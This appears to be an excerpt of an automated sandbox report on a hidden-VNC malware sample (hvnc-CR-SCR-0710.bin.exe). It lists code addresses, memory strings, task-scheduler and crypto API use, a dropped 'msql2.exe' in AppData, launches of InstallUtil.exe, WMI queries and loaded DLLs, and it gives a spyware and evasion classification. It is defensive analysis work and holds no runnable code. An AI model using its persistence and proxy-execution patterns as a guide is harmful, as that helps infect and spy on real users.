Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060EEDD0	2_2_060EEDD0
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060EEDE0	2_2_060EEDE0
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060EF370	2_2_060EF370
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060EF380	2_2_060EF380
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060FB548	2_2_060FB548
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060F6AF0	2_2_060F6AF0
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060F8088	2_2_060F8088
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060FB538	2_2_060FB538
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060F7210	2_2_060F7210
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060F1278	2_2_060F1278
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060F52A8	2_2_060F52A8
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060F52A5	2_2_060F52A5
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060F6ADF	2_2_060F6ADF
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060F8082	2_2_060F8082
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_0611877A	2_2_0611877A
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_06110007	2_2_06110007
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_06110040	2_2_06110040
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_064DD890	2_2_064DD890
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_064C0040	2_2_064C0040
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_064C0006	2_2_064C0006
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_064DCCA8	2_2_064DCCA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_01504010	4_2_01504010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_01501598	4_2_01501598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_015015A8	4_2_015015A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_01501BCE	4_2_01501BCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_01501BF2	4_2_01501BF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_01501BAC	4_2_01501BAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_01501C56	4_2_01501C56
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_01501C14	4_2_01501C14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_01503CEE	4_2_01503CEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_01503EC6	4_2_01503EC6
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_01AD2930	5_2_01AD2930
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_01AD78A0	5_2_01AD78A0
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_01AD16D8	5_2_01AD16D8
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_01ADE648	5_2_01ADE648
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_01ADD060	5_2_01ADD060
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_01AD3760	5_2_01AD3760
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_01AD3751	5_2_01AD3751
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06A34410	5_2_06A34410
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06A30A00	5_2_06A30A00
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06A30D37	5_2_06A30D37
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06A32018	5_2_06A32018
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AA7390	5_2_06AA7390
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AA56A0	5_2_06AA56A0
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AA5690	5_2_06AA5690
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AA7380	5_2_06AA7380
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AA0007	5_2_06AA0007
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AA0040	5_2_06AA0040
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AA7939	5_2_06AA7939
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AE8F49	5_2_06AE8F49
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AE8F58	5_2_06AE8F58
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AEEDE0	5_2_06AEEDE0
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AEEDD0	5_2_06AEEDD0
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AEF380	5_2_06AEF380
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AEF370	5_2_06AEF370
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AFB548	5_2_06AFB548
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AF6AF0	5_2_06AF6AF0
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AF8088	5_2_06AF8088
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AFB538	5_2_06AFB538
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AF52A8	5_2_06AF52A8
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AF52A5	5_2_06AF52A5
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AF6ADF	5_2_06AF6ADF
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AF7210	5_2_06AF7210
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AF1278	5_2_06AF1278
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AF8082	5_2_06AF8082
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06B1877A	5_2_06B1877A
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06B10006	5_2_06B10006
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06B10040	5_2_06B10040
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06EDD890	5_2_06EDD890
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06EDCCA8	5_2_06EDCCA8
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06EC0040	5_2_06EC0040
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06EC0006	5_2_06EC0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00D34010	8_2_00D34010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00D31598	8_2_00D31598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00D315A8	8_2_00D315A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00D33DDB	8_2_00D33DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04F34570	8_2_04F34570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04F3C798	8_2_04F3C798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04F348D0	8_2_04F348D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04F3BB80	8_2_04F3BB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04F34560	8_2_04F34560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04F396C6	8_2_04F396C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04F39778	8_2_04F39778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04F3BEC8	8_2_04F3BEC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_04F348C3	8_2_04F348C3

Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1745552576.00000000066C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1724334331.000000000102E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1742387770.00000000060E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamehvnc-CR-SCR-0710.exeB vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000000.1682024434.0000000000972000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamehvnc-CR-SCR-0710.exeB vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.000000000327F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFlljiryo.exe" vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.0000000003E59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.0000000003EF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamehvnc-CR-SCR-0710.exeB vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000003168000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs hvnc-CR-SCR-0710.bin.exe
Source: hvnc-CR-SCR-0710.bin.exe	Binary or memory string: OriginalFilenamehvnc-CR-SCR-0710.exeB vs hvnc-CR-SCR-0710.bin.exe

Source: hvnc-CR-SCR-0710.bin.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.2.hvnc-CR-SCR-0710.bin.exe.4447550.5.raw.unpack, Record.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.4447550.5.raw.unpack, CustomerExceptionDef.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.4447550.5.raw.unpack, CustomerExceptionDef.cs	Cryptographic APIs: 'CreateDecryptor'

Source: hvnc-CR-SCR-0710.bin.exe, TaskMessageMessage.cs	Task registration methods: 'RegisterProxy'
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.spyw.evad.winEXE@9/5@4/5

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe

File created: C:\Users\user\AppData\Roaming\msql2.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\2a6c98df8e
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL

Source: hvnc-CR-SCR-0710.bin.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: hvnc-CR-SCR-0710.bin.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: hvnc-CR-SCR-0710.bin.exe	ReversingLabs: Detection: 26%
Source: hvnc-CR-SCR-0710.bin.exe	Virustotal: Detection: 34%

Source: hvnc-CR-SCR-0710.bin.exe

String found in binary or memory: g(2) = -Start from the license

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe

File read: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe "C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe"
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\msql2.exe "C:\Users\user\AppData\Roaming\msql2.exe"
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\msql2.exe "C:\Users\user\AppData\Roaming\msql2.exe"
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Section loaded: rasman.dll	Jump to behavior
